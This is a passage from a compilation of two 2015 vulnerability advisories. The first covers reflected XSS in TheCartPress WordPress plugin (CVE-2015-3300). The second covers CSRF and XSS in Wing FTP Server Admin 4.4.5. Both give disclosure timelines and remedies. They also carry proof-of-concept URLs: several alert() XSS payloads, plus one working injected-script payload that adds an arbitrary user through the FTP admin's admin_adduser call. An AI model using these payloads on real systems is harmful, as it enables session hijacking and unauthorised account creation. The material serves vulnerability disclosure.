4) Multiple XSS in TheCartPress WordPress plugin (against administrator only): CVE-2015-3300

4.1 Input passed via the "search_by" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressesList.php&search_by=--%3E%%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.2 Input passed via the "address_id", "address_name", "firstname", "lastname", "street", "city", "postcode", "email" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&address_name=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&firstname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

-----------------------------------------------------------------------------------------------

Solution:

2015-04-08 Vendor Alerted via emails.
2015-04-17 Vendor Alerted via contact form and emails.
2015-04-17 Vendor Alerted via WordPress Support Forums.
2015-04-27 Fix Requested via emails.
2015-04-29 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.
According to the vendor the plugin will not be supported anymore since 1st of June 2015: http://thecartpress.com/extend/important-note-nota-importante/

We recommend disabling or removing the vulnerable plugin as a workaround.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23254 - https://www.htbridge.com/advisory/HTB23254 - Multiple vulnerabilities in TheCartPress Wordpress plugin.
[2] TheCartPress Wordpress plugin- http://thecartpress.com/ - Professional WordPress eCommerce Plugin. Use it as Shopping Cart, Catalog or Framework.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
Document Title:
===============
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities


Release Date:
=============
2015-04-28


apparitionsec ID (AS-ID):
====================================
AS-WFTP0328


Common Vulnerability Scoring System:
====================================
Overall CVSS Score 8.9


Product:
===============================
Wing FTP Server is a Web based administration FTP client that supports
following protocols FTP, FTPS, HTTPS, SSH



Advisory Information:
==============================
Security researcher John Page discovered a CSRF & client-side cross site
scripting web vulnerability within Wing FTP Server Admin that allows adding
arbitrary users to the system.



Vulnerability Disclosure Timeline:
==================================
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new  patched version 4.4.6
April 28, 2015: Public Disclosure - John Page



Affected Product(s):
====================
Wing FTP Server Admin 4.4.5
Product: Wing FTP Server - Admin


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================


Request Method(s):
                                [+] POST & GET


Vulnerable Product:
                                [+] Wing FTP Server Admin 4.4.5


Vulnerable Parameter(s):
                                [+] domain & type


Affected Area(s):
                                [+] Server Admin


Proof of Concept (POC):
=======================
The CSRF and client-side cross site scripting web vulnerability can be
exploited by remote attackers without privileged application user account
and with low user interaction (click). Payload will add arbitrary users to
the system.

POC: Example

http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]

POC: Payload(s) Add arbitrary user to the system:

http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas
 ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E


POC XSS:
http://localhost:5466/admin_viewstatus.html?domain=


POC XSS:
http://localhost:5466/admin_event_list.html?type=


Solution - Fix & Patch:
=======================
Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)


Security Risk:
==============
The security risk of the CSRF client-side cross site scripting web
vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9


Credits & Authors:
==================
John Page ( hyp3rlinx ) - ISR godz @apparitionsec


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. the security research reporter John Page disclaims all
warranties, either expressed or implied, including the warranties of
merchantability and capability for a particular purpose. apparitionsec or
its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits or special
damages.

Domains:  hyp3rlinx.altervista.org